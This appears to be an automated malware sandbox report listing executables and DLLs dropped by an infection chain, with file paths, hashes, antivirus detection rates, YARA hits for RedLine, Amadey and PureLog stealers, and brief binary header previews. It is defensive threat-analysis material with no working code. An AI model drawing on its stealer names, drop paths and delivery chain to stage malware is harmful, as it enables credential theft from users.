                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......wD..3%..3%..3%..hM..=%..hM...%..hM.. %...H..!%...H..'%...H..F%..hM.."%..3%...%...K..2%...Ko.2%...K..2%..Rich3%..........................PE..L.... Me..........................................@.......................................@.................................D...x....p...........................L..P...8...................,...........@............................................text............................... ..`.rdata..............................@..@.data....F... ...4..................@....rsrc........p.......:..............@..@.reloc...L.......N...<..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\amert[1].exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1954304
                                                                                                                                                                                                                                        Entropy (8bit):7.949125787105512
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:bb8AxYTZxGZlY10exJdsegG+8G531KDR0S4hKUpy:bcTZx0cBnl+15u44
                                                                                                                                                                                                                                        MD5:3AB592D71455D47170AB784430AE8102
                                                                                                                                                                                                                                        SHA1:D1F9827AA3F176420CC15CB99963780934FE3CD1
                                                                                                                                                                                                                                        SHA-256:41D1FAFA48A4F81C07C306577EE78968112A5B380A0BE1D6038C0833C6DF56A3
                                                                                                                                                                                                                                        SHA-512:A718D3F7FF2B5D94435BDDDF37D16547C2FB695A2B620A7EA03504385AEB57C5BADDC351BAF57E0A43380AB0EBAF0031C4EC5C3D79CD196FEF934CA7D9750A4D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 45%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*R..n3.@n3.@n3.@5[.A`3.@5[.A.3.@.^.A|3.@.^.Az3.@.^.A.3.@5[.Az3.@5[.A}3.@n3.@.3.@.].Ao3.@.]u@o3.@.].Ao3.@Richn3.@........................PE..L......e.............................@M...........@..........................pM..........@.................................Vp..j....`......................p.M............................. .M..................................................... . .P..........................@....rsrc........`......................@....idata .....p......................@... ..+.........................@...nkxbjlfg.....p2.....................@...kzjaljwy.....0M.....................@....taggant.0...@M.."..................@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sarra[1].exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2408448
                                                                                                                                                                                                                                        Entropy (8bit):7.927494038697244
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:lg69SebPPiKgYy0BmHY8vE79obDmwwBIfVraq0hV4qvKJgNHjBMFQ:lg69SebiYA879kDmwwwOq0hiqugd
                                                                                                                                                                                                                                        MD5:C5F77CF7894DE0F146E72AD8DA6A591B
                                                                                                                                                                                                                                        SHA1:D195F6EAF4A478C29328CCC0D22FA4B87A3118CC
                                                                                                                                                                                                                                        SHA-256:A4303E824749A711BBF166967D96B2927E33E9F5E4A61E8ADC6F3620F95790A6
                                                                                                                                                                                                                                        SHA-512:A3D32197CC377EEEB5461A02BF2B86E8E2D3CB125B6F1A60460478DE8477D43EDDDA88E4C45ACA4C292877B0BF82C06A3F2D4EC0DEA0A28B3A3F41F2A3276B52
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 51%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......j.....s...s...s.e.p.%.s.e.v...s.e.t./.s..y..*.s..yw.=.s..yp.4.s..yv.u.s.e.w.6.s.e.u./.s.e.r.5.s...r...s..zz.2.s..z../.s..../.s..zq./.s.Rich..s.................PE..L...^.%f...............'.............@^...........@..........................P^.......%...@.................................^ ..r....p........................].............................l.].................................@................... . .`..........................@....rsrc........p......................@....idata ..... ......................@... ..+..0......................@...xoahvbru.....@D.....................@...vfiegpwq.....@^.......$.............@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\swiiii[1].exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):162304
                                                                                                                                                                                                                                        Entropy (8bit):7.967195699444992
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:I1lmOH349skOxH49PsH+8KqnuHV7A/5S+c6wABA47PN/6wHFHJ:I1iekOxYlI+EuH2cvAe4BywlH
                                                                                                                                                                                                                                        MD5:586F7FECACD49ADAB650FAE36E2DB994
                                                                                                                                                                                                                                        SHA1:35D9FB512A8161CE867812633F0A43B042F9A5E6
                                                                                                                                                                                                                                        SHA-256:CF88D499C83DA613AD5CCD8805822901BDC3A12EB9B15804AEFF8C53DC05FC4E
                                                                                                                                                                                                                                        SHA-512:A44A2C99D18509681505CF70A251BAF2558030A8648D9C621ACC72FAFCB2F744E3EF664DFD0229BAF7C78FB72E69F5D644C755DED4060DCAFA7F711D70E94772
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....G..........."...0..p...........4... ........@.. ....................................`.................................74..O....................................3..8............................................ ............... ..H............text...Po... ...p.................. ..`.rsrc................r..............@..@.reloc...............x..............@..B................k4......H........$.................................................................]*....0............i.s........+...o.......X.... ....2..o.......o........8.........-N....d....(......(....&s..........o.........o...........o....r...p(.....3....+.s....%.o....%.o....%.o....%.o....%.o....%.o....%.Lo....%.o....%.o....%.o....%o.....Yo.........+........(...........o....+....2...X.. ....?........+<. ....... ...............XX.. ....].......................X.. ....2........8.......+w..X ....].

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\gold[1].exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):471152
                                                                                                                                                                                                                                        Entropy (8bit):7.708138361823541
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:dxFiggCdJqiuBD2wxLdCGZeJqld72RJ7/SB0UkUmpG:588Iiu8eLYm0qld6kBRRqG
                                                                                                                                                                                                                                        MD5:B22521FB370921BB5D69BF8DEECCE59E
                                                                                                                                                                                                                                        SHA1:3D4486B206E8AAAC14A3CF201C5AC152A2A7D4EA
                                                                                                                                                                                                                                        SHA-256:B30D10E292F89F4D288839974F71F6B703D6D9A9AE698EA172A2B64364E77158
                                                                                                                                                                                                                                        SHA-512:1F7D64BA5266314ED18F577F0984706C21F4F48E8CDB069130E4435C2BCDF219F8DD27E4D3BF3A373F4DB4C01E30EFE8D7F4D87F4D8CBBBEAF9C7043F685994C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3u.%w..vw..vw..v.f.w{..v.f.w...v.f.wb..v...we..v...wc..v.f.w~..vw..v*..v...w:..v...wv..v...wv..vRichw..v................PE..L....&f...............'.....j.......J............@..........................@............@.................................,I..d.......................p&... .. ..../.............................../..@...............T............................text............................... ..`.rdata..............................@..@.data...T....`.......@..............@....reloc.. .... ......................@..B........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\jok[1].exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):311296
                                                                                                                                                                                                                                        Entropy (8bit):5.0817932970004
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:uq6EgY6i4rUjhYMLwPcologL/ejZWTACtAti0lcZqf7D34leqiOLibBOp:VqY6inwPDpKZWTA+AplcZqf7DIvL
                                                                                                                                                                                                                                        MD5:8510BCF5BC264C70180ABE78298E4D5B
                                                                                                                                                                                                                                        SHA1:2C3A2A85D129B0D750ED146D1D4E4D6274623E28
                                                                                                                                                                                                                                        SHA-256:096220045877E456EDFEA1ADCD5BF1EFD332665EF073C6D1E9474C84CA5433F6
                                                                                                                                                                                                                                        SHA-512:5FF0A47F9E14E22FC76D41910B2986605376605913173D8AD83D29D85EB79B679459E2723A6AD17BC3C3B8C9B359E2BE7348EE1C21FA2E8CEB7CC9220515258D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\jok[1].exe, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)v................0................. ... ....@.. ....................... ............@.................................t...O.... ..............................X................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2397184
                                                                                                                                                                                                                                        Entropy (8bit):7.929142981070319
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:Kg69SebPPiKgYy9bOxGNLL9zDNgvELoEewJTJo4759x:Kg69SebiLbhZL92vlEewlJo47v
                                                                                                                                                                                                                                        MD5:A5E341D76C1BE40293C678679CA9A729
                                                                                                                                                                                                                                        SHA1:D8687917F5B9B3C5D9F51996CE2F5A1CC4A539B2
                                                                                                                                                                                                                                        SHA-256:90652AABBE1B148E1F7FCF58914E0654097B3542638890F23CB61B194411E1BE
                                                                                                                                                                                                                                        SHA-512:207A8F2DBF1E62F8B6E9E0256C3A7BEF5BDBC05F264BE160067D5C59A77D08E516A820D3860B9BE6D2B45193C4C8B614EE81AF933DDFF04A3FACE2AC473DE6E4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......j.....s...s...s.e.p.%.s.e.v...s.e.t./.s..y..*.s..yw.=.s..yp.4.s..yv.u.s.e.w.6.s.e.u./.s.e.r.5.s...r...s..zz.2.s..z../.s..../.s..zq./.s.Rich..s.................PE..L...^.%f...............'..............]...........@...........................^.......$...@.................................m0.......p.......................6].............................d6].................................@................... . .`..........................@....rsrc........p......................@....idata .....0......................@... ..*..@......................@...unpqzwpm..... D.....................@...glmqmaxs......].......$.............@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\cred64[1].dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1285632
                                                                                                                                                                                                                                        Entropy (8bit):6.460276790319054
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:2vkQL6YY4wMPSYZofkf0Gh6Pi41+a9uyP5dggv4+yC7:2sMPSYcS5wPi095PbgS4
                                                                                                                                                                                                                                        MD5:F35B671FDA2603EC30ACE10946F11A90
                                                                                                                                                                                                                                        SHA1:059AD6B06559D4DB581B1879E709F32F80850872
                                                                                                                                                                                                                                        SHA-256:83E3DF5BEC15D5333935BEA8B719A6D677E2FB3DC1CF9E18E7B82FD0438285C7
                                                                                                                                                                                                                                        SHA-512:B5FA27D08C64727CEF7FDDA5E68054A4359CD697DF50D70D1D90DA583195959A139066A6214531BBC5F20CD4F9BC1CA3E4244396547381291A6A1D2DF9CF8705
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\cred64[1].dll, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............^...^...^.._...^.._...^.._2..^W._..^W._...^W._...^.._...^...^C..^.._...^.._...^..X^...^.._...^Rich...^........................PE..d......e.........." .........R......h........................................P............`......................................... ...X...x........ .......`..(............0..........p........................... ................................................text............................... ..`.rdata..............................@..@.data...L........D..................@....pdata..(....`......................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\file300un[1].exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):871224
                                                                                                                                                                                                                                        Entropy (8bit):7.24103546516255
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:EA+sYjJA6W7c5f6ydp1xlxrekNp6MARWch8kDSX+/Pw9Glg3z/F1EIJQWwChTc55:EAwOc5zTderJ/Pe0g3PaWvdc5Fqe
                                                                                                                                                                                                                                        MD5:021B6C96FE692E2BB8D4B0D02E9133B0
                                                                                                                                                                                                                                        SHA1:4FF05288024AEF4F289C22E4E6985F82C29E49D5
                                                                                                                                                                                                                                        SHA-256:FF477A862BD6E5ACEBE92887A6F221418DA1995DFB0ABED8527E21FDA9B8950B
                                                                                                                                                                                                                                        SHA-512:AFC29E105225F8F92C74B8EAD1DF10BEDBF6C795CAD72C53A6CE6237B71D3F73E346CD6E0116C6A380F7D07E79FA5007E63DF8DFE414D0C7816AAF5828CEA482
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 30%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....'f.........."...0..v............... ....@...... ....................................`.........................................................................X2............................................................................... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@........................................H.......X&...o......`.....................................................................................................................................................................................(....*:.(......}....*..(.....r...p.(....o....s ...}....*..*.(....{....*r(....%-.&.*{.....(....o"...**..R.(....*r(....%-.&.*{.....(....o(...*..(/...*Z..}......}......}....*6.{.....o....*6.{.....o....*6.{.....o....*r.(K.....}......}......}....*J.(.....~....}....*>...~.....("...*>...~....

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\swiiiii[1].exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):329352
                                                                                                                                                                                                                                        Entropy (8bit):7.976897467568528
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:DFZcMaQk5oqtag00+wX3bSJxuI2Hc8PlsLNuPhRF1Ym:DFZg5Ztj00+03mJxmc8PfPwm
                                                                                                                                                                                                                                        MD5:1C7D0F34BB1D85B5D2C01367CC8F62EF
                                                                                                                                                                                                                                        SHA1:33AEDADB5361F1646CFFD68791D72BA5F1424114
                                                                                                                                                                                                                                        SHA-256:E9E09C5E5D03D21FCA820BD9B0A0EA7B86AB9E85CDC9996F8F1DC822B0CC801C
                                                                                                                                                                                                                                        SHA-512:53BF85D2B004F69BBBF7B6DC78E5F021ABA71B6F814101C55D3BF76E6D058A973BC58270B6B621B2100C6E02D382F568D1E96024464E8EA81E6DB8CCD948679D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...]h.f................................. ........@.. ....................... .......b....`.................................L...O.......:................N........................................................... ............... ..H............text........ ...................... ..`.rsrc...:...........................@..@.reloc..............................@..B........................H........................................................................0..........r...p.*..(....*..0..........rg..p.*..(....*...]*.0..\.........i.s........+...o.......X.... ....2..o.......o........8.........-X....d....(......(....&s..........o......o.....1......o...........o....r...po.....3....+.s.........o.......o.......o.......o.......o.......o.......Lo.......o.......o...........o........o.....Yo.........+........(...........o....+....2...X.. ....?........+A..... ........

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\alexxxxxxxx[1].exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1793536
                                                                                                                                                                                                                                        Entropy (8bit):7.937675203377117
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:L/eYUVc8uWw3Sg6s8Zep6UXIEgf7WD4GTF:L/eYUW8bwUaPXVgzWMG
                                                                                                                                                                                                                                        MD5:85A15F080B09ACACE350AB30460C8996
                                                                                                                                                                                                                                        SHA1:3FC515E60E4CFA5B3321F04A96C7FB463E4B9D02
                                                                                                                                                                                                                                        SHA-256:3A2006BC835A8FFE91B9EE9206F630B3172F42E090F4E8D90BE620E540F5EF6B
                                                                                                                                                                                                                                        SHA-512:ADE5E3531DFA1A01E6C2A69DEB2962CBF619E766DA3D6E8E3453F70FF55CCBCBE21381C7B97A53D67E1CA88975F4409B1A42A759E18F806171D29E4C3F250E9F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\alexxxxxxxx[1].exe, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e.................T..........Nr... ........@.. ....................................`..................................r..K.......D............................q............................................... ............... ..H............text...TR... ...T.................. ..`.rsrc...D............V..............@..@.reloc...............\..............@..B................0r......H........w..x...........$....&...........................................0..j.......~....:_.........~....(.... .... .... ....s....~....(............~....(....~....(.... ....?....r...ps....z*...(....*..0..$.........r...p......~....(....~....(......*...]*....0................s.........}.......i..... .......... ...............&........}....8......{.......d.....~....(................{....~....(....s.........o.......o.......o.......o.......o............{....o........:............s

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\clip64[1].dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):112128
                                                                                                                                                                                                                                        Entropy (8bit):6.400356358225577
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:D4uSD+ZwruS0bGYuZRtasSVh/QEIegRQod4l:kuTiabruZR8JSlD4l
                                                                                                                                                                                                                                        MD5:154C3F1334DD435F562672F2664FEA6B
                                                                                                                                                                                                                                        SHA1:51DD25E2BA98B8546DE163B8F26E2972A90C2C79
                                                                                                                                                                                                                                        SHA-256:5F431129F97F3D56929F1E5584819E091BD6C854D7E18503074737FC6D79E33F
                                                                                                                                                                                                                                        SHA-512:1BCA69BBCDB7ECD418769E9D4BEFC458F9F8E3CEE81FEB7316BB61E189E2904F4431E4CC7D291E179A5DEC441B959D428D8E433F579036F763BBAD6460222841
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\clip64[1].dll, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\clip64[1].dll, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.j.c.j.c.j.8.i.i.j.8.o..j.8.n.q.j..n.l.j..i.r.j..o.B.j.8.k.d.j.c.k...j...c.`.j...j.b.j.....b.j...h.b.j.Richc.j.........................PE..L......e...........!.....$...........f.......@............................................@......................... ...........P.......................................8...........................(...@............@..L............................text...6#.......$.................. ..`.rdata..4i...@...j...(..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\install[1].exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2470704
                                                                                                                                                                                                                                        Entropy (8bit):7.990554749886877
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:49152:zgwRtL9Hckjh40JEvPXJnxNH0IHK61VW/2t+YKpEv6o2sUX7fEgvr:zgwRB98kj3JCPF71HKAV3+YAEaZ7fEgj
                                                                                                                                                                                                                                        MD5:55F780EA4DC5A5401B80915D69A55481
                                                                                                                                                                                                                                        SHA1:5EBDDE7F87637493DE0A5E7A4FFCD59839672C4E
                                                                                                                                                                                                                                        SHA-256:C3014A898F63FAB694A759D56BB0B3C979484EEDD32708E1467E566B4F3DFA70
                                                                                                                                                                                                                                        SHA-512:680CA9D6F5AA4D53E7083858BFD4D3FC71F567993968EDC83DDF262E15B2ED06F07C5A4C47E65F4874074213ADF3CD978B8EAA658563694CAF013FB126948697
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L......P.....................\....../.............@..........................P......3-......................................t........0..................................................................................l............................text.............................. ..`.rdata...;.......<..................@..@.data....M..........................@....rsrc........0......................@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P.c...P....Y.nj'.S....u..v..=..A..6P......P....9^..].v8.^..3......h..A.P..........P......P..x.A..E..E....;F.r......P.f...Y.r8..j...t.A...t$..D....V....s......A..F8......^.j..q.....A..3.9.`.A.t...@....9D$.t..t$.Ph.....5X.A.....A.3.....D$..`...|$..u..@.....3.....p.A.............t$..D$..t$...`.A./.@..t$...P.Q..%`.A...3.....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u...t$...T.A..L$.......%..........S.\$.V..C;^.tLW3.j.Z...........Q.d.....3.9F.Y~.9F

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1166336
                                                                                                                                                                                                                                        Entropy (8bit):7.035559017923821
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:mqDEvCTbMWu7rQYlBQcBiT6rprG8au+2+b+HdiJUX:mTvC/MTQYxsWR7au+2+b+HoJU
                                                                                                                                                                                                                                        MD5:81A8F98229FF9CD694A2CB7389D22EF8
                                                                                                                                                                                                                                        SHA1:05DF05F574BC9122886743ED7BEB8887F2439237
                                                                                                                                                                                                                                        SHA-256:FB20F4C38C1F0D0D02422214FBB45DEED82E18F8B239A4383B50512431C56536
                                                                                                                                                                                                                                        SHA-512:E167682092AC7E9CCD5B75CF969E69178D90FA3778567DD7BB9A4AB998A71AA1A360BF55A52A0ED814E31260B9F21EFCE1C3F811908B26F29C8ED9C3D31C4BBD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...E.'f..........".................w.............@..........................0.......Y....@...@.......@.....................d...|....@..|a.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...|a...@...b..................@..@.reloc...u.......v...V..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\RageMP131\RageMP131.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2397184
                                                                                                                                                                                                                                        Entropy (8bit):7.929142981070319
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:Kg69SebPPiKgYy9bOxGNLL9zDNgvELoEewJTJo4759x:Kg69SebiLbhZL92vlEewlJo47v
                                                                                                                                                                                                                                        MD5:A5E341D76C1BE40293C678679CA9A729
                                                                                                                                                                                                                                        SHA1:D8687917F5B9B3C5D9F51996CE2F5A1CC4A539B2
                                                                                                                                                                                                                                        SHA-256:90652AABBE1B148E1F7FCF58914E0654097B3542638890F23CB61B194411E1BE
                                                                                                                                                                                                                                        SHA-512:207A8F2DBF1E62F8B6E9E0256C3A7BEF5BDBC05F264BE160067D5C59A77D08E516A820D3860B9BE6D2B45193C4C8B614EE81AF933DDFF04A3FACE2AC473DE6E4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
